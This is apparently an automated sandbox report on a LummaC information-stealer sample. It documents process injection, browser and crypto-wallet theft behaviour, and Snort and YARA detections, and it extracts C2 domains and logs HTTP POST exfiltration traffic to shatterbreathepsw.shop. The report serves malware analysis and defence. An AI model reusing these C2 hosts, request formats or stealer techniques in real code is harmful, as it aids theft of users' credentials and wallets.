Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1435406
MD5:7e37f8c945d005226870e60aa2baea93
SHA1:d8a457a032ead8cc0d692efd497914e8cc69e8a4
SHA256:d130f492c40697a34e2d1e7b1e9a5e3ba37c7f6b4271271fba6b5c1e9048af8b
Tags:exe
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected LummaC Stealer
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 420 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 7E37F8C945D005226870E60AA2BAEA93)
    • BitLockerToGo.exe (PID: 7060 cmdline: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["demonstationfukewko.shop", "liabilitynighstjsko.shop", "alcojoldwograpciw.shop", "incredibleextedwj.shop", "shortsvelventysjo.shop", "shatterbreathepsw.shop", "tolerateilusidjukl.shop", "productivelookewr.shop", "shatterbreathepsw.shop"], "Build id": "xpsGVF--GEIROPA"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000005.00000003.2397981986.0000000002E93000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000005.00000003.2389056869.0000000002E93000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000005.00000003.2483917008.0000000002EAF000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000005.00000002.2532039828.0000000002EAF000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              00000000.00000002.2354687188.000000C000326000.00000004.00001000.00020000.00000000.sdmpMsfpayloads_msf_9Metasploit Payloads - file msf.war - contentsFlorian Roth
              • 0x0:$x1: 4d5a9000030000000
              Click to see the 6 entries

              Sigma Signatures

              No Sigma rule has matched

              Snort Signatures

              Timestamp:05/02/24-17:04:31.224285
              SID:2052224
              Source Port:49722
              Destination Port:443
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/02/24-17:04:21.147175
              SID:2052224
              Source Port:49718
              Destination Port:443
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/02/24-17:04:21.035950
              SID:2052217
              Source Port:51308
              Destination Port:53
              Protocol:UDP
              Classtype:A Network Trojan was detected
              Timestamp:05/02/24-17:04:22.766689
              SID:2052224
              Source Port:49719
              Destination Port:443
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/02/24-17:04:32.059166
              SID:2052224
              Source Port:49723
              Destination Port:443
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/02/24-17:04:34.127001
              SID:2052224
              Source Port:49726
              Destination Port:443
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/02/24-17:04:24.741485
              SID:2052224
              Source Port:49720
              Destination Port:443
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/02/24-17:04:32.842406
              SID:2052224
              Source Port:49724
              Destination Port:443
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/02/24-17:04:25.682174
              SID:2052224
              Source Port:49721
              Destination Port:443
              Protocol:TCP
              Classtype:A Network Trojan was detected

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus detection for URL or domain
              Source: https://shatterbreathepsw.shop:443/apiAvira URL Cloud: Label: malware
              Source: https://shatterbreathepsw.shop/apiAvira URL Cloud: Label: malware
              Found malware configuration
              Source: 0.3.file.exe.c00047c000.1.unpackMalware Configuration Extractor: LummaC {"C2 url": ["demonstationfukewko.shop", "liabilitynighstjsko.shop", "alcojoldwograpciw.shop", "incredibleextedwj.shop", "shortsvelventysjo.shop", "shatterbreathepsw.shop", "tolerateilusidjukl.shop", "productivelookewr.shop", "shatterbreathepsw.shop"], "Build id": "xpsGVF--GEIROPA"}
              Multi AV Scanner detection for domain / URL
              Source: shatterbreathepsw.shopVirustotal: Detection: 17%Perma Link
              Source: tolerateilusidjukl.shopVirustotal: Detection: 14%Perma Link
              Source: shortsvelventysjo.shopVirustotal: Detection: 19%Perma Link
              Source: https://shatterbreathepsw.shop:443/apiVirustotal: Detection: 19%Perma Link
              Source: shatterbreathepsw.shopVirustotal: Detection: 17%Perma Link
              Source: demonstationfukewko.shopVirustotal: Detection: 20%Perma Link
              Source: https://shatterbreathepsw.shop/0Virustotal: Detection: 15%Perma Link
              Source: https://shatterbreathepsw.shop/apiTVirustotal: Detection: 16%Perma Link
              Source: productivelookewr.shopVirustotal: Detection: 16%Perma Link
              Source: incredibleextedwj.shopVirustotal: Detection: 14%Perma Link
              Source: liabilitynighstjsko.shopVirustotal: Detection: 17%Perma Link
              Source: alcojoldwograpciw.shopVirustotal: Detection: 20%Perma Link
              Source: https://shatterbreathepsw.shop/apiVirustotal: Detection: 19%Perma Link
              Multi AV Scanner detection for submitted file
              Source: file.exeReversingLabs: Detection: 34%
              Source: file.exeVirustotal: Detection: 37%Perma Link
              Sample uses string decryption to hide its real strings
              Source: 00000000.00000003.2265990913.000000C00047C000.00000004.00001000.00020000.00000000.sdmpString decryptor: demonstationfukewko.shop
              Source: 00000000.00000003.2265990913.000000C00047C000.00000004.00001000.00020000.00000000.sdmpString decryptor: liabilitynighstjsko.shop
              Source: 00000000.00000003.2265990913.000000C00047C000.00000004.00001000.00020000.00000000.sdmpString decryptor: alcojoldwograpciw.shop
              Source: 00000000.00000003.2265990913.000000C00047C000.00000004.00001000.00020000.00000000.sdmpString decryptor: incredibleextedwj.shop
              Source: 00000000.00000003.2265990913.000000C00047C000.00000004.00001000.00020000.00000000.sdmpString decryptor: shortsvelventysjo.shop
              Source: 00000000.00000003.2265990913.000000C00047C000.00000004.00001000.00020000.00000000.sdmpString decryptor: shatterbreathepsw.shop
              Source: 00000000.00000003.2265990913.000000C00047C000.00000004.00001000.00020000.00000000.sdmpString decryptor: tolerateilusidjukl.shop
              Source: 00000000.00000003.2265990913.000000C00047C000.00000004.00001000.00020000.00000000.sdmpString decryptor: productivelookewr.shop
              Source: 00000000.00000003.2265990913.000000C00047C000.00000004.00001000.00020000.00000000.sdmpString decryptor: shatterbreathepsw.shop
              Source: 00000000.00000003.2265990913.000000C00047C000.00000004.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
              Source: 00000000.00000003.2265990913.000000C00047C000.00000004.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
              Source: 00000000.00000003.2265990913.000000C00047C000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
              Source: 00000000.00000003.2265990913.000000C00047C000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
              Source: 00000000.00000003.2265990913.000000C00047C000.00000004.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
              Source: 00000000.00000003.2265990913.000000C00047C000.00000004.00001000.00020000.00000000.sdmpString decryptor: xpsGVF--GEIROPA
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_02D05977 CryptUnprotectData,5_2_02D05977
              Source: unknownHTTPS traffic detected: 104.21.95.19:443 -> 192.168.2.6:49718 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.95.19:443 -> 192.168.2.6:49719 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.95.19:443 -> 192.168.2.6:49720 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.95.19:443 -> 192.168.2.6:49721 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.95.19:443 -> 192.168.2.6:49722 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.95.19:443 -> 192.168.2.6:49723 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.95.19:443 -> 192.168.2.6:49724 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.95.19:443 -> 192.168.2.6:49726 version: TLS 1.2
              Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: BitLockerToGo.pdb source: file.exe, 00000000.00000002.2354687188.000000C0002EC000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2354687188.000000C0001D7000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2354687188.000000C000212000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2342735024.000001E6FBA50000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: BitLockerToGo.pdbGCTL source: file.exe, 00000000.00000002.2354687188.000000C0002EC000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2354687188.000000C0001D7000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2354687188.000000C000212000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2342735024.000001E6FBA50000.00000004.00001000.00020000.00000000.sdmp
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+20h]5_2_02D10352
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov edx, dword ptr [esi+08h]5_2_02D0D343
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+08h]5_2_02D0633E
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 73CEF4DDh5_2_02D291A2
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, dword ptr [esp+04h]5_2_02D07AE2
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ebx, eax5_2_02CF4BB0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+10h]5_2_02CFAB00
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then lea eax, dword ptr [esp+00000084h]5_2_02D05977
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, dword ptr [esp+10h]5_2_02CF9E70
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov edx, dword ptr [esp+08h]5_2_02CF9E70
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [eax], cx5_2_02D13FD5
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 18DC7455h5_2_02D26CF0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, dword ptr [esp+08h]5_2_02D05D07
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esi+20h]5_2_02D012DF
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, dword ptr [esi+20h]5_2_02D012DF
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 73CEF4DDh5_2_02D292A1
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp word ptr [edi+edx], 0000h5_2_02D0727D
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 7A1A689Fh5_2_02D27220
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp byte ptr [eax+ecx], 00000000h5_2_02D153B0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp eax5_2_02D133B9
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, dword ptr [esi+00000534h]5_2_02D163BC
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, dword ptr [esi+10h]5_2_02D2934E
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, dword ptr [esi+00000534h]5_2_02D16312
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ebx, byte ptr [edx]5_2_02D230D0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp word ptr [edi+eax+02h], 0000h5_2_02D0A000
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ebx, eax5_2_02CF31D0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp eax5_2_02D121A3
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp eax5_2_02D1515A
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 5C3924FCh5_2_02D27110
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp eax5_2_02D01114
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp byte ptr [ecx], 00000000h5_2_02D026D2
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esi+00000090h]5_2_02D186C5
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp byte ptr [ebx+eax+01h], 00000000h5_2_02D136F0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp eax5_2_02D2A6E8
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esi+00000090h]5_2_02D16644
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esi+00000090h]5_2_02D16647
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edx, byte ptr [esi+edi]5_2_02CF2610
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov edx, dword ptr [esp]5_2_02D27620
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp byte ptr [edi], 00000000h5_2_02D017DE
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esi+04h]5_2_02D117EE
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov edx, dword ptr [esi+20h]5_2_02D047A1
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp eax5_2_02D2A720
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov edi, eax5_2_02CF64E0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, dword ptr [esi+00000534h]5_2_02D162C8
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 0AB35B01h5_2_02D03B97
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp eax5_2_02D068DD
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp eax5_2_02D068F0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]5_2_02D13880
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esi+00000090h]5_2_02D15F0E
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [eax], cl5_2_02D06983
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [eax], cl5_2_02D06983
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then lea ebx, dword ptr [edi+ecx]5_2_02D11FA1
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov edx, dword ptr [esp+60h]5_2_02D14F56
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [ebx], al5_2_02D15F13
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp eax5_2_02D11CC6
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp edx5_2_02D0CCF0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then inc ebx5_2_02D04C00

              Networking

              barindex
              Snort IDS alert for network traffic
              Source: TrafficSnort IDS: 2052217 ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (shatterbreathepsw .shop) 192.168.2.6:51308 -> 1.1.1.1:53
              Source: TrafficSnort IDS: 2052224 ET TROJAN Observed Lumma Stealer Related Domain (shatterbreathepsw .shop in TLS SNI) 192.168.2.6:49718 -> 104.21.95.19:443
              Source: TrafficSnort IDS: 2052224 ET TROJAN Observed Lumma Stealer Related Domain (shatterbreathepsw .shop in TLS SNI) 192.168.2.6:49719 -> 104.21.95.19:443
              Source: TrafficSnort IDS: 2052224 ET TROJAN Observed Lumma Stealer Related Domain (shatterbreathepsw .shop in TLS SNI) 192.168.2.6:49720 -> 104.21.95.19:443
              Source: TrafficSnort IDS: 2052224 ET TROJAN Observed Lumma Stealer Related Domain (shatterbreathepsw .shop in TLS SNI) 192.168.2.6:49721 -> 104.21.95.19:443
              Source: TrafficSnort IDS: 2052224 ET TROJAN Observed Lumma Stealer Related Domain (shatterbreathepsw .shop in TLS SNI) 192.168.2.6:49722 -> 104.21.95.19:443
              Source: TrafficSnort IDS: 2052224 ET TROJAN Observed Lumma Stealer Related Domain (shatterbreathepsw .shop in TLS SNI) 192.168.2.6:49723 -> 104.21.95.19:443
              Source: TrafficSnort IDS: 2052224 ET TROJAN Observed Lumma Stealer Related Domain (shatterbreathepsw .shop in TLS SNI) 192.168.2.6:49724 -> 104.21.95.19:443
              Source: TrafficSnort IDS: 2052224 ET TROJAN Observed Lumma Stealer Related Domain (shatterbreathepsw .shop in TLS SNI) 192.168.2.6:49726 -> 104.21.95.19:443
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: demonstationfukewko.shop
              Source: Malware configuration extractorURLs: liabilitynighstjsko.shop
              Source: Malware configuration extractorURLs: alcojoldwograpciw.shop
              Source: Malware configuration extractorURLs: incredibleextedwj.shop
              Source: Malware configuration extractorURLs: shortsvelventysjo.shop
              Source: Malware configuration extractorURLs: shatterbreathepsw.shop
              Source: Malware configuration extractorURLs: tolerateilusidjukl.shop
              Source: Malware configuration extractorURLs: productivelookewr.shop
              Source: Malware configuration extractorURLs: shatterbreathepsw.shop
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: shatterbreathepsw.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 56Host: shatterbreathepsw.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12861Host: shatterbreathepsw.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15107Host: shatterbreathepsw.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19965Host: shatterbreathepsw.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 3802Host: shatterbreathepsw.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1365Host: shatterbreathepsw.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 556486Host: shatterbreathepsw.shop
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficDNS traffic detected: DNS query: shatterbreathepsw.shop
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: shatterbreathepsw.shop
              Source: file.exeString found in binary or memory: http://.css
              Source: file.exeString found in binary or memory: http://.jpg
              Source: BitLockerToGo.exe, 00000005.00000003.2421315426.000000000526D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: BitLockerToGo.exe, 00000005.00000003.2421315426.000000000526D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: BitLockerToGo.exe, 00000005.00000003.2421315426.000000000526D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: BitLockerToGo.exe, 00000005.00000003.2421315426.000000000526D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: BitLockerToGo.exe, 00000005.00000003.2421315426.000000000526D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: BitLockerToGo.exe, 00000005.00000003.2421315426.000000000526D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: BitLockerToGo.exe, 00000005.00000003.2421315426.000000000526D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: file.exeString found in binary or memory: http://html4/loose.dtd
              Source: BitLockerToGo.exe, 00000005.00000003.2421315426.000000000526D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: BitLockerToGo.exe, 00000005.00000003.2421315426.000000000526D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: BitLockerToGo.exe, 00000005.00000003.2421315426.000000000526D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: BitLockerToGo.exe, 00000005.00000003.2421315426.000000000526D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: BitLockerToGo.exe, 00000005.00000003.2389832770.0000000002F4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: BitLockerToGo.exe, 00000005.00000003.2462513783.0000000002F0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
              Source: BitLockerToGo.exe, 00000005.00000003.2462513783.0000000002F0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
              Source: BitLockerToGo.exe, 00000005.00000003.2389832770.0000000002F4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: BitLockerToGo.exe, 00000005.00000003.2389832770.0000000002F4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: BitLockerToGo.exe, 00000005.00000003.2389832770.0000000002F4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: BitLockerToGo.exe, 00000005.00000003.2462513783.0000000002F0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
              Source: BitLockerToGo.exe, 00000005.00000003.2462513783.0000000002F0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
              Source: file.exeString found in binary or memory: https://database.usgovcloudapi.net/unsupported
